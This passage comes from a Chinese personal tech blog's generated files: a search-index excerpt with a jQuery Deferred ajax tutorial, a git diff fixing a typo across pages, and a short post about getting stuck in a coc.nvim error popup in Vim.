success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.resolve(data); }, error:function(data){ dfd.reject(data); } }); return dfd.promise(); }); //根据callId查询录音文件,不仅仅是异步请求可以做成Promise形式,任何函数都可以做成Promise形式 App.addMethod(\u0026#39;_getRecordingsByCallId\u0026#39;,function(callId){ var dfd = $.Deferred(), path = \u0026#39;/api/tenantcalls/\u0026#39;+callId+\u0026#39;/recordings\u0026#39;; App._sendRequest(path) .done(function(res){dfd.resolve(res);}) .fail(function(res){dfd.reject(res);}); return dfd.promise(); }); // 获取录音 App.addMethod(\u0026#39;getCallDetailRecordings\u0026#39;,function(callId){ App._getRecordingsByCallId(callId) .done(function(res){ // 获取结果后渲染数据 App.renderRecording(res); }) .fail(function(res){ App.error(res); }); }); 5. 注意事项 jQuery的Promise主要是用了jQquery的$.Derferred()方法,一些老版本的jquery并不支持此方法。 jQuery版本必须大于等于1.5,推荐使用1.11.3 6. 参考文献 jquery官方api文档 jquery维基百科文档 7. 最后 以上文章仅供参考,不包完全正确。欢迎评论,3q。\n","permalink":"https://wdd.js.org/posts/2018/01/jquery-deferred/","summary":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 
不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.","title":"熟练使用使用jQuery Promise (Deferred)"}] \ No newline at end of file diff --git a/index.xml b/index.xml index d6233b7db..828e8d625 100644 --- a/index.xml +++ b/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/tags/all/index.html b/tags/all/index.html index 2f33f87fc..7de704f71 100644 --- a/tags/all/index.html +++ b/tags/all/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/tags/all/index.xml b/tags/all/index.xml index ac18e802f..700571fbe 100644 --- 
a/tags/all/index.xml +++ b/tags/all/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/index.html b/vim/index.html index 8c2a7fbf8..b85ea72b7 100644 --- a/vim/index.html +++ b/vim/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/index.xml b/vim/index.xml index d475ced53..9ed2506a7 100644 --- a/vim/index.xml +++ b/vim/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/stuck-in-error-msgfloat-window/index.html b/vim/stuck-in-error-msgfloat-window/index.html index 76d9af4d4..0043d825d 100644 --- a/vim/stuck-in-error-msgfloat-window/index.html +++ b/vim/stuck-in-error-msgfloat-window/index.html @@ -2,7 +2,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 @@ -11,7 +11,7 @@ 因为错误提示只有一行,所以无法上下移动。 
一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 @@ -19,12 +19,12 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 -我只能学会解决并适应VIM, 并且接受VIM的所有挑战。">

困在coc错误弹窗中

请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上下移动。 我的光标被困在了错误提示框中。

因为错误提示只有一行,所以无法上下移动。

一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。

正常情况下,当光标不在关键词上时,错误弹窗会自动关闭。 但是由于我已经进入了错误弹窗内部, 所以除非按窗口切换的快捷键,否则我会始终被困在这个错误窗口中。
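除了反复按窗口切换快捷键之外,coc.nvim 本身也提供了操作浮动窗口的函数。下面是一个可以写入 init.vim 的示意配置(假设使用 coc.nvim,快捷键 `<leader>fc` 是我随手取的,可按个人习惯修改),用一个快捷键直接关闭所有浮动窗口,从而跳出错误弹窗:

```vim
" 仅作示意:假设安装了 coc.nvim
" coc#float#close_all() 会关闭当前所有 coc 浮动窗口
" 普通模式下按 <leader>fc 即可一键关闭错误弹窗,光标回到原窗口
nnoremap <silent> <leader>fc :call coc#float#close_all()<CR>
```

这样即使光标已经陷进浮动窗口,也不必再去数自己按了几次 ctrl + w w。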

我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。

能解决困难,则学到东西。

否则就只能放弃VIM, 回到VScode的怀抱中。

但是,我已经习惯了不使用鼠标的快捷编辑方式。

我只能学着解决问题、适应VIM, 并且接受VIM的所有挑战。